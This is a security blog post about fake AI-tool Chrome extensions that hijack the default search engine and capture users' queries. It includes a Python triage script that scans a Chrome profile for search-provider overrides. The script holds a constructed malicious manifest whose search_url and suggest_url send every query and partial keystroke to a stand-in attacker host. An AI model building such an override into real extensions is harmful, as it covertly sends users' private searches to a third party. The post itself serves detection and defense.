Beware the Fake AI: Malicious Chrome Extensions Hijack Your Search Data
- Dean Charlton

- Oct 1, 2025
- 2 min read
A concerning new cybersecurity trend has emerged, exploiting the surging popularity of Artificial Intelligence tools to compromise user security. Threat actors are now distributing malicious Chrome extensions that masquerade as legitimate interfaces for popular AI platforms like ChatGPT, Claude, Perplexity, and Meta Llama, creating a significant risk for individuals and organizations alike.
Palo Alto Networks analysts have identified this renewed activity as part of a strategic shift by attackers to exploit emerging technology trends for maximum impact. The goal is to deceive users seeking convenient, one-click access to these services directly from their browser.

How the Infection Works
The extensions are not benign: each one reconfigures the browser so that the user's searches pass through attacker infrastructure. The mechanism has three parts.
Persistence through Deception: The extensions use Chrome's chrome_settings_overrides manifest key, whose search_provider entry lets an extension replace the browser's default search engine. Users who accept the install prompt typically do not realize they have also handed over their default search engine, and the change stays in effect for as long as the extension remains installed.
Man-in-the-Middle Redirection: Once installed, every search typed into the omnibox (address bar) is sent to the attacker-controlled search provider instead of the user's real search engine. The domains seen in this campaign include chatgptforchrome[.]com and gen-ai-search[.]com, which sit in the middle and return results so the browser still appears to work normally.
Data Capture: Because the attacker's server now receives the raw query string, anything typed into the address bar is captured: confidential information, personal data, and proprietary business intelligence that users routinely type into what they believe is a trusted search box is funneled directly to the attackers.
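To make the mechanism concrete, here is an added example (not code from the original post or from the Palo Alto Networks report) that shows what a search-provider override looks like and how a responder can find one on a machine. The manifest below is constructed for illustration, the domain search.attacker.example and the 32-letter extension IDs are placeholders, and the suggest_url field is included because Chrome's manifest format allows it: when present, the browser also sends partial keystrokes to that URL as the user types, before Enter is pressed. The scan function walks a Chrome profile's Extensions directory (Linux: ~/.config/google-chrome/Default/Extensions; macOS: ~/Library/Application Support/Google/Chrome/Default/Extensions; Windows: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions) and reports any extension that declares a search_provider override together with the hosts that would receive queries.

```python
"""Triage helper: flag installed Chrome extensions that override the default
search provider via the `chrome_settings_overrides` manifest key, and show
where a typed query would actually be sent."""
import json
import os
import tempfile
from urllib.parse import quote_plus, urlsplit

# Constructed manifests for illustration only; not the campaign's real files.
# `search.attacker.example` stands in for an attacker-controlled domain.
MALICIOUS_MANIFEST = json.loads("""{
  "manifest_version": 3,
  "name": "ChatGPT for Chrome",
  "version": "1.0.3",
  "chrome_settings_overrides": {
    "search_provider": {
      "name": "AI Search",
      "keyword": "ai",
      "search_url": "https://search.attacker.example/?q={searchTerms}",
      "suggest_url": "https://search.attacker.example/suggest?q={searchTerms}",
      "favicon_url": "https://search.attacker.example/favicon.ico",
      "encoding": "UTF-8",
      "is_default": true
    }
  }
}""")

BENIGN_MANIFEST = {"manifest_version": 3, "name": "Harmless Notes", "version": "2.1"}


def search_override(manifest):
    """Return the search_provider block an extension declares, or None."""
    overrides = manifest.get("chrome_settings_overrides") or {}
    provider = overrides.get("search_provider")
    return provider if isinstance(provider, dict) else None


def override_hosts(manifest):
    """Hosts that would receive the user's queries if this extension is installed.
    search_url receives the submitted query; suggest_url receives keystrokes as
    the user types, so both are reported."""
    provider = search_override(manifest)
    if provider is None:
        return {}
    hosts = {}
    for field in ("search_url", "suggest_url"):
        url = provider.get(field)
        if url:
            hosts[field] = urlsplit(url).hostname
    return hosts


def expand_search_url(search_url, query):
    """The request Chrome issues when `query` is submitted from the omnibox:
    the {searchTerms} placeholder is replaced by the URL-encoded query."""
    return search_url.replace("{searchTerms}", quote_plus(query))


def scan_extensions_dir(root):
    """Walk a profile's Extensions/ directory (layout: <id>/<version>/manifest.json)
    and return {extension_id: {field: host}} for every search override found."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        if "manifest.json" not in files:
            continue
        try:
            with open(os.path.join(dirpath, "manifest.json"), encoding="utf-8") as f:
                manifest = json.load(f)
        except (OSError, ValueError):
            continue  # unreadable or not JSON; skip rather than abort the triage
        hosts = override_hosts(manifest)
        if hosts:
            ext_id = os.path.basename(os.path.dirname(dirpath))
            findings[ext_id] = hosts
    return findings


def demo_scan():
    """Build a throwaway profile layout holding both manifests and scan it.
    The extension IDs are made-up strings in Chrome's 32-letter ID format."""
    with tempfile.TemporaryDirectory() as root:
        layout = (("abcdefghijklmnopabcdefghijklmnop", MALICIOUS_MANIFEST),
                  ("ponmlkjihgfedcbaponmlkjihgfedcba", BENIGN_MANIFEST))
        for ext_id, manifest in layout:
            version_dir = os.path.join(root, "Extensions", ext_id, "1.0.3_0")
            os.makedirs(version_dir)
            with open(os.path.join(version_dir, "manifest.json"), "w", encoding="utf-8") as f:
                json.dump(manifest, f)
        return scan_extensions_dir(os.path.join(root, "Extensions"))


if __name__ == "__main__":
    provider = search_override(MALICIOUS_MANIFEST)
    print("a typed query becomes:", expand_search_url(provider["search_url"], "q3 revenue forecast"))
    print("scan findings:", demo_scan())
```

Point scan_extensions_dir at a real profile's Extensions directory to run the check for real; on a clean profile it returns an empty dict, since ordinary extensions have no reason to declare a search_provider override. Any hit whose host is not a search engine you recognise deserves the extension's removal and a reset of the default search engine.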
Sophisticated Distribution and Reach
The threat actors are employing sophisticated social engineering techniques, including utilizing YouTube promotional content to entice users into installing the extensions. This demonstrates a clear understanding of modern digital marketing and user acquisition.
The extensions initially appear functional, letting users type prompts directly into the search bar, but this is only an illusion of legitimacy while the redirection runs in the background. Earlier iterations of similar campaigns reached thousands of users; the current wave spans eight identified extension IDs and has shown comparable reach and persistence. Anyone who has installed one of these extensions should remove it and confirm that the default search engine under chrome://settings/search is back to the provider they actually chose.